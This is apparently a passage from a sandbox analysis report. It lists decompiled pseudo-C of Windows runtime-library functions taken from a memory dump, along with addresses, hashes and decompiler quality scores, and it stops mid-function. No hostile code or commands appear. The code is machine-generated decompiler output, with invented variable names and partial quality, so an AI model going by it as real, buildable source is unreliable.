                                                            0x048ebc8d
                                                            0x048ebc94
                                                            0x048ebcbd
                                                            0x048ebcca
                                                            0x048ebccb
                                                            0x048ebccc
                                                            0x048ebccd
                                                            0x048ebcce
                                                            0x048ebcd4
                                                            0x048ebcea
                                                            0x048ebcee
                                                            0x048ebcf2
                                                            0x048ebd00
                                                            0x048ebd04
                                                            0x00000000
                                                            0x048ebc96
                                                            0x048ebcab
                                                            0x048ebcaf
                                                            0x048ebd2c
                                                            0x048ebd2c
                                                            0x048ebd09
                                                            0x00000000
                                                            0x048ebd09
                                                            0x048ebcb1
                                                            0x048ebcb5
                                                            0x048ebcbb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048ebcbb

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72b4d2075c66e3311bde6017d7a122b3c37d1bb4ce00d5ded9b304680046eddb
                                                            • Instruction ID: c1ae70e40baf1653ed36b8f7f9d2219ff19633e993daac4d819f8e71bc7bc696
                                                            • Opcode Fuzzy Hash: 72b4d2075c66e3311bde6017d7a122b3c37d1bb4ce00d5ded9b304680046eddb
                                                            • Instruction Fuzzy Hash: 8F310E32A046159BDB01DF9AD4807B677A4EF1A314F090A78ED95EB201EB78FD458BC0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E1DB5, Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E048E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E048DF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L048D4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E048DF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                            0x048e1dc2
                                                            0x048e1dc5
                                                            0x048e1dc7
                                                            0x048e1dcc
                                                            0x048e1dce
                                                            0x048e1dd6
                                                            0x048e1ddf
                                                            0x048e1de0
                                                            0x048e1de1
                                                            0x048e1de5
                                                            0x048e1de8
                                                            0x048e1def
                                                            0x048e1df0
                                                            0x048e1df6
                                                            0x048e1df7
                                                            0x048e1dfe
                                                            0x048e1e1a
                                                            0x00000000
                                                            0x00000000
                                                            0x048e1e0b
                                                            0x048e1e12
                                                            0x048e1e12
                                                            0x048e1e00
                                                            0x048e1e00
                                                            0x048e1e05
                                                            0x048e1e1e
                                                            0x048e1e23
                                                            0x0492570f
                                                            0x04925713
                                                            0x00000000
                                                            0x00000000
                                                            0x04925719
                                                            0x04925719
                                                            0x048e1e2c
                                                            0x048e1e2d
                                                            0x048e1e2e
                                                            0x048e1e2f
                                                            0x048e1e31
                                                            0x048e1e32
                                                            0x048e1e35
                                                            0x048e1e3d
                                                            0x04925723
                                                            0x0492573d
                                                            0x0492573d
                                                            0x00000000
                                                            0x04925723
                                                            0x048e1e49
                                                            0x048e1e4e
                                                            0x048e1e4e
                                                            0x048e1e09
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                            • Instruction ID: c5ba2f3b94d90cb40be12f8e5405a41a6e0622ef0c658b4be289a65ea01361c0
                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                            • Instruction Fuzzy Hash: 76218071A00119AFD720CF5ACC84EAABBBDEF86A54F154955F505D7250DA30BE01D790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048B9100, Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E048B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x498f6e8);
				E0490D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E049888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0490D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x49a86c0; // 0x3707b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x49a86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E048D2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E049888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E048FAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x49ab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x49a84c0;
										if(_t69 >=  *0x49a84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04989063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E048B922A(_t82);
							_t53 = E048D7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04988B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x49a86c0; // 0x3707b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x49a86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x49a86bc;
										_t72 = 0x49a86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E048B9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x49a86c4;
									_t72 = 0x49a86c0;
									L18:
									E048E9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                            0x048b9100
                                                            0x048b9100
                                                            0x048b9100
                                                            0x048b9100
                                                            0x048b9102
                                                            0x048b9107
                                                            0x048b910c
                                                            0x048b9110
                                                            0x048b9115
                                                            0x048b9136
                                                            0x048b9143
                                                            0x049137e4
                                                            0x049137e4
                                                            0x048b9149
                                                            0x048b914e
                                                            0x048b914e
                                                            0x048b9117
                                                            0x048b911d
                                                            0x00000000
                                                            0x00000000
                                                            0x048b911f
                                                            0x048b9125
                                                            0x00000000
                                                            0x048b9151
                                                            0x048b9158
                                                            0x048b915d
                                                            0x048b9161
                                                            0x048b9168
                                                            0x04913715
                                                            0x00000000
                                                            0x048b916e
                                                            0x048b916e
                                                            0x048b9175
                                                            0x048b9177
                                                            0x048b917e
                                                            0x048b917f
                                                            0x048b9182
                                                            0x048b9182
                                                            0x048b9187
                                                            0x048b9187
                                                            0x048b918a
                                                            0x048b918d
                                                            0x048b918f
                                                            0x048b9192
                                                            0x048b9195
                                                            0x048b9198
                                                            0x048b9198
                                                            0x048b9198
                                                            0x048b919a
                                                            0x00000000
                                                            0x00000000
                                                            0x0491371f
                                                            0x04913721
                                                            0x04913727
                                                            0x0491372f
                                                            0x04913733
                                                            0x04913735
                                                            0x04913738
                                                            0x0491373b
                                                            0x0491373d
                                                            0x04913740
                                                            0x00000000
                                                            0x00000000
                                                            0x04913746
                                                            0x04913749
                                                            0x00000000
                                                            0x00000000
                                                            0x0491374f
                                                            0x04913751
                                                            0x00000000
                                                            0x00000000
                                                            0x04913757
                                                            0x04913759
                                                            0x0491375c
                                                            0x0491375c
                                                            0x0491375e
                                                            0x0491375e
                                                            0x04913761
                                                            0x04913764
                                                            0x00000000
                                                            0x00000000
                                                            0x04913766
                                                            0x04913768
                                                            0x049137a3
                                                            0x049137a3
                                                            0x049137a5
                                                            0x049137a7
                                                            0x049137ad
                                                            0x049137b0
                                                            0x049137b2
                                                            0x049137bc
                                                            0x049137c2
                                                            0x049137c2
                                                            0x049137b2
                                                            0x048b9187
                                                            0x048b9187
                                                            0x048b918a
                                                            0x048b918d
                                                            0x048b918f
                                                            0x048b9192
                                                            0x048b9195
                                                            0x00000000
                                                            0x048b9195
                                                            0x00000000
                                                            0x048b9187
                                                            0x0491376a
                                                            0x0491376a
                                                            0x0491376c
                                                            0x0491376c
                                                            0x0491376f
                                                            0x04913775
                                                            0x00000000
                                                            0x00000000
                                                            0x04913777
                                                            0x04913779
                                                            0x00000000
                                                            0x00000000
                                                            0x04913782
                                                            0x04913787
                                                            0x04913789
                                                            0x04913790
                                                            0x04913790
                                                            0x0491378b
                                                            0x0491378b
                                                            0x0491378b
                                                            0x04913792
                                                            0x04913795
                                                            0x04913795
                                                            0x04913798
                                                            0x04913798
                                                            0x0491379b
                                                            0x0491379b
                                                            0x048b91a3
                                                            0x048b91a9
                                                            0x048b91b0
                                                            0x048b91b4
                                                            0x048b91b4
                                                            0x048b91bb
                                                            0x048b91c0
                                                            0x048b91c5
                                                            0x048b91c7
                                                            0x049137da
                                                            0x048b91cd
                                                            0x048b91cd
                                                            0x048b91cd
                                                            0x048b91d2
                                                            0x048b91d5
                                                            0x048b9239
                                                            0x048b9239
                                                            0x048b91d7
                                                            0x048b91db
                                                            0x048b91e1
                                                            0x048b91e7
                                                            0x048b91fd
                                                            0x048b9203
                                                            0x048b921e
                                                            0x048b9223
                                                            0x00000000
                                                            0x048b9223
                                                            0x048b9205
                                                            0x048b9208
                                                            0x048b920c
                                                            0x048b9214
                                                            0x048b9214
                                                            0x048b91e9
                                                            0x048b91e9
                                                            0x048b91ee
                                                            0x048b91f3
                                                            0x048b91f3
                                                            0x048b91f3
                                                            0x048b91e7
                                                            0x00000000
                                                            0x048b91db
                                                            0x048b9187
                                                            0x048b9168

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7295880eefea8011ac9870cfe77c7386615c9511c8e39485dad4c69b690b1faa
                                                            • Instruction ID: f2855694ded44ce448bb89bb2682a20f6b96aebdd56116aee485f1e4582946fc
                                                            • Opcode Fuzzy Hash: 7295880eefea8011ac9870cfe77c7386615c9511c8e39485dad4c69b690b1faa
                                                            • Instruction Fuzzy Hash: BB31E7B1A05645DFEB21EF68C0887ECBBB5BF88314F188A69C554A7351C378B940DBD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048D0050, Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E048D0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x49ad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E048E9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E048FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04988A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E048E9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x49ab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                            0x048d0055
                                                            0x048d005d
                                                            0x048d0062
                                                            0x048d006c
                                                            0x048d006f
                                                            0x048d0074
                                                            0x048d007a
                                                            0x048d007a
                                                            0x048d0080
                                                            0x048d0080
                                                            0x048d0087
                                                            0x048d008d
                                                            0x048d008f
                                                            0x048d0093
                                                            0x048d0095
                                                            0x048d009b
                                                            0x048d00f8
                                                            0x048d00fb
                                                            0x048d00fc
                                                            0x048d00ff
                                                            0x048d0108
                                                            0x048d0108
                                                            0x048d00a2
                                                            0x048d00a6
                                                            0x048d00b3
                                                            0x048d00bc
                                                            0x048d00c5
                                                            0x048d00ca
                                                            0x0491c01e
                                                            0x00000000
                                                            0x00000000
                                                            0x0491c02d
                                                            0x048d00d5
                                                            0x048d00d9
                                                            0x0491c03d
                                                            0x0491c046
                                                            0x0491c046
                                                            0x048d00df
                                                            0x048d00e2
                                                            0x048d00ea
                                                            0x048d00ef
                                                            0x048d00f2
                                                            0x048d00f6
                                                            0x048d0111
                                                            0x048d0117
                                                            0x048d0117
                                                            0x00000000
                                                            0x048d00f6
                                                            0x048d00d0
                                                            0x048d00d0
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b937d3c9121d08c1f76be32724fda61e9e20f4b28ed414c59a24f9eb837989a3
                                                            • Instruction ID: ba95a2f8242a35aa67824a1d19b2c7a91b97116afd23909b5d35416b749ecae4
                                                            • Opcode Fuzzy Hash: b937d3c9121d08c1f76be32724fda61e9e20f4b28ed414c59a24f9eb837989a3
                                                            • Instruction Fuzzy Hash: C9319C31602A089FD721DF28C840B6AB7E5FF89718F144A6DE596C7A90EB75BC01CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04936C0A, Relevance: .1, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E04936C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E048D7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x49a7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L048D4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E048FF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E048D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E048F9AE0();
						_t23 = L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                            0x04936c0a
                                                            0x04936c0f
                                                            0x04936c10
                                                            0x04936c13
                                                            0x04936c15
                                                            0x04936c19
                                                            0x04936c1c
                                                            0x04936c21
                                                            0x04936c28
                                                            0x04936c3a
                                                            0x04936c2a
                                                            0x04936c33
                                                            0x04936c33
                                                            0x04936c3f
                                                            0x04936c48
                                                            0x04936c4d
                                                            0x04936c60
                                                            0x04936c65
                                                            0x04936c69
                                                            0x04936c73
                                                            0x04936c79
                                                            0x04936c7f
                                                            0x04936c86
                                                            0x04936c90
                                                            0x04936c94
                                                            0x04936ca6
                                                            0x04936cb2
                                                            0x04936cbd
                                                            0x04936cbd
                                                            0x04936cc3
                                                            0x04936cc7
                                                            0x04936ccb
                                                            0x04936cd0
                                                            0x04936cd1
                                                            0x04936ce2
                                                            0x04936ce2
                                                            0x04936c69
                                                            0x04936ced

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c0924d78ea93585ca36545b452b01000f0d14aa1830687f7655dfd7bcbe85cd
                                                            • Instruction ID: f0c572bcfff277c7911c9ee0a51782714592699965408839f06071c7015b3caa
                                                            • Opcode Fuzzy Hash: 6c0924d78ea93585ca36545b452b01000f0d14aa1830687f7655dfd7bcbe85cd
                                                            • Instruction Fuzzy Hash: 892188B1A00644ABD7219B6CD880E2AB7A8FF49704F14056AFA05C7790D678ED10CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F90AF, Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E048F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0490D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E048EE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L048D4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E048FF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E048EA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                            0x048f90af
                                                            0x048f90b8
                                                            0x048f90bb
                                                            0x048f90bf
                                                            0x048f90c2
                                                            0x048f90c2
                                                            0x048f90c8
                                                            0x048f90cb
                                                            0x048f90cd
                                                            0x049314d7
                                                            0x049314eb
                                                            0x049314eb
                                                            0x00000000
                                                            0x049314eb
                                                            0x049314db
                                                            0x049314e6
                                                            0x00000000
                                                            0x049314f2
                                                            0x049314e8
                                                            0x00000000
                                                            0x049314e8
                                                            0x048f90d8
                                                            0x048f90da
                                                            0x048f90dd
                                                            0x048f90e5
                                                            0x00000000
                                                            0x048f9139
                                                            0x048f90fa
                                                            0x048f90fe
                                                            0x048f9142
                                                            0x00000000
                                                            0x048f9142
                                                            0x048f9104
                                                            0x048f9107
                                                            0x048f910b
                                                            0x048f9110
                                                            0x048f9118
                                                            0x048f9147
                                                            0x048f9148
                                                            0x048f914f
                                                            0x048f9150
                                                            0x048f9151
                                                            0x048f9152
                                                            0x048f9156
                                                            0x048f915d
                                                            0x048f9160
                                                            0x048f9168
                                                            0x048f916c
                                                            0x048f91bc
                                                            0x048f91be
                                                            0x00000000
                                                            0x048f91be
                                                            0x048f916e
                                                            0x048f9173
                                                            0x048f9176
                                                            0x00000000
                                                            0x00000000
                                                            0x048f917c
                                                            0x048f9180
                                                            0x048f91b5
                                                            0x00000000
                                                            0x048f91b5
                                                            0x048f9182
                                                            0x048f9185
                                                            0x048f9189
                                                            0x00000000
                                                            0x00000000
                                                            0x048f918e
                                                            0x048f9190
                                                            0x048f9198
                                                            0x00000000
                                                            0x00000000
                                                            0x048f91a0
                                                            0x00000000
                                                            0x048f91ad
                                                            0x048f91ad
                                                            0x048f91b0
                                                            0x048f91b1
                                                            0x00000000
                                                            0x048f9185
                                                            0x048f911a
                                                            0x048f911c
                                                            0x048f911f
                                                            0x048f9125
                                                            0x048f9127
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                            • Instruction ID: f974dc0406c8a4511eebd1c43d1537950bb29ecae54edf13cba26930b02afc1e
                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                            • Instruction Fuzzy Hash: C0214FB1A00208EFDB20DF59C845F6AF7F8EB44754F14897AEA49E7250D274F9548F90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E3B7A, Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E048E3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

